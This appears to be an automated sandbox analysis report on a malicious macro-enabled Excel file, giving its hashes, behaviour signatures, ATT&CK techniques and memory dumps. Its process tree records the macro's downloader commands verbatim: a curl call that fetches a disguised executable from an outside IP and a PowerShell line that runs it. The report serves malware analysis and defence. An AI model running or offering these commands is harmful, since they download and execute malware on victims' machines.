Analysis

  • max time kernel
    145s
  • max time network
    137s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    22-07-2021 18:30

General

  • Target

    350763-394867-221021.xlsm

  • Size

    140KB

  • MD5

    d4fe00d6e9975dd31e96b9d786503069

  • SHA1

    28b875f8547a4bcb0bdc539d784769e7ab8815e8

  • SHA256

    6f5fdf14d35bfe303b9f1b4f3698df919755cb0f76c841f5a9a852939f9c9962

  • SHA512

    4304bd670022078646a4d91d2ceb252eb21be5f2121bdf4e3dbe2719694ae1a4828b6881e387f2d3585b130cf11c5b2502fbcc8c56e037e7de141c97fce57e33

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 17 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\350763-394867-221021.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3944
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe start-sleep 10; $x=$env:AppData+'\DzXbP.exe';Invoke-Expression $x
      2⤵
      • Process spawned unexpected child process
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3964
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c curl http://151.236.30.123/images/suntogether.png -o %appdata%\DzXbP.exe
      2⤵
      • Process spawned unexpected child process
      PID:2824

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2824-259-0x0000000000000000-mapping.dmp
  • memory/3944-117-0x00007FFDA2790000-0x00007FFDA27A0000-memory.dmp
    Filesize

    64KB

  • memory/3944-115-0x00007FFDA2790000-0x00007FFDA27A0000-memory.dmp
    Filesize

    64KB

  • memory/3944-114-0x00007FF793FB0000-0x00007FF797566000-memory.dmp
    Filesize

    53.7MB

  • memory/3944-118-0x00007FFDA2790000-0x00007FFDA27A0000-memory.dmp
    Filesize

    64KB

  • memory/3944-122-0x00007FFDA2790000-0x00007FFDA27A0000-memory.dmp
    Filesize

    64KB

  • memory/3944-121-0x00007FFDC3030000-0x00007FFDC411E000-memory.dmp
    Filesize

    16.9MB

  • memory/3944-123-0x00007FFDC0FC0000-0x00007FFDC2EB5000-memory.dmp
    Filesize

    31.0MB

  • memory/3944-116-0x00007FFDA2790000-0x00007FFDA27A0000-memory.dmp
    Filesize

    64KB

  • memory/3964-258-0x0000000000000000-mapping.dmp
  • memory/3964-267-0x0000020CC10E0000-0x0000020CC10E1000-memory.dmp
    Filesize

    4KB

  • memory/3964-270-0x0000020CC1520000-0x0000020CC1521000-memory.dmp
    Filesize

    4KB

  • memory/3964-278-0x0000020CC1130000-0x0000020CC1132000-memory.dmp
    Filesize

    8KB

  • memory/3964-279-0x0000020CC1133000-0x0000020CC1135000-memory.dmp
    Filesize

    8KB

  • memory/3964-288-0x0000020CC1136000-0x0000020CC1138000-memory.dmp
    Filesize

    8KB